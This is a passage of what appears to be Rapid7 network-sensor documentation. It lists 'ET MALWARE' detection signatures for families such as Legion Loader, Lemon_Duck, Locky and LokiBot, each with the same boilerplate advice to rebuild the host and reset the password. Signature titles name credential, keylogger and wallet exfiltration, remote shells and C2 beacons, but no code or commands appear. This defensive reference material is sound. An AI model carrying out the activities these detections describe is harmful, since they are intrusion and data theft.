Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kronos Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kronos Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kronos Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kryptik Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kuluoz Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kuluoz/Asprox Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE L0rdix Stealer CnC Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE L0rdix Stealer CnC Sending Screenshot

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LAME SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lampion CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LankerBoy HTTP CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Lazarus Downloader (JEUSD) CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Lazarus Maldoc CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LeChiffre Ransomware CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Legion Loader Activity Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (Amen)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (carlos_castaneda)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (heil_moloch)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (heil_satan)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (legion)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (lilith)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (Mylegion666)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (neva-project)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (salmonella-symptome)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (satan)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (suspira)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (the devil)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (YourUserAgent)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Linux Shell Script CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell CnC Activity M14

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell CnC Checkin M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell - Install Tracking

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell - RDP Credential Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Arid Viper APT Advtravel Campaign GET Keepalive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Arid Viper APT Advtravel Campaign POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely CryptoWall .onion Proxy domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Evil Macro EXE DL mar 15 2016

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Evil Macro EXE DL mar 28 2016

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Evil Request for uac.exe With Minimal Headers

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Fake Antivirus Download InternetAntivirusPro.exe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely FakeAV/Fakeinit/FraudLoad Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely FakeAV/Fakeinit/FraudLoad Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely FakeAV/Fakeinit/FraudLoad Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely GandCrab Ransomware Domain in HTTP Host M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Likely GandCrab Ransomware Domain in HTTP Host M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Likely Geodo/Emotet CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Likely Geodo/Emotet Downloading PE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Geodo/Emotet Downloading PE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Geodo/Emotet Downloading PE - Fake UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Infected HTTP POST to PHP with User-Agent of HTTP Client

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Koobface Beaconing (getexe)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Malware CnC Hosted on 000webhostapp - POST to gate.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely PadCrypt Locker PKG DL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likseput.B Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Limitless Logger RAT HTTP Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linkup Ransomware check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Linux Backdoor Linux/Cdorked.A Redirect 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux Backdoor Linux/Cdorked.A Redirect 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux Backdoor Linux/Cdorked.A Redirect 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux DarkRadiation Ransomware Activity Attack Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Linux DarkRadiation Ransomware Activity (curl)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Linux DarkRadiation Ransomware Activity (wget)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Linux DarkRadiation Ransomware Telegram Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Linux/Lady CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/Lady CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/LuaBot CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/MayhemBruter Inbound Ping From CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Moose HTTP CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/Moose HTTP CnC Beacon Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux.Mumblehard Command Status CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux.Mumblehard Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux.Ngioweb Stage 1 CnC Activity Client Request (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Ssemgrvd sshd Backdoor HTTP CNC 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Ssemgrvd sshd Backdoor HTTP CNC 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/SSHDoor.A Reporting Backdoor CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/Torte Downloading Binary

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Remote Shell M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Remote Shell M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LNK/Agent.GX CnC Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LockPOS CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC Checkin Dec 5 M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC Checkin HTTP Pattern

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC checkin Nov 21

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC checkin Nov 21 M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky Intermediate Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LogPOS Sending Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Cryptocurrency Wallet Exfiltration Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Fake 404 Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot File Exfiltration Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Keylogger Data Exfiltration Detected M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Keylogger Data Exfiltration Detected M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Request for C2 Commands Detected M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Request for C2 Commands Detected M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Screenshot Exfiltration Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Description
Copy link

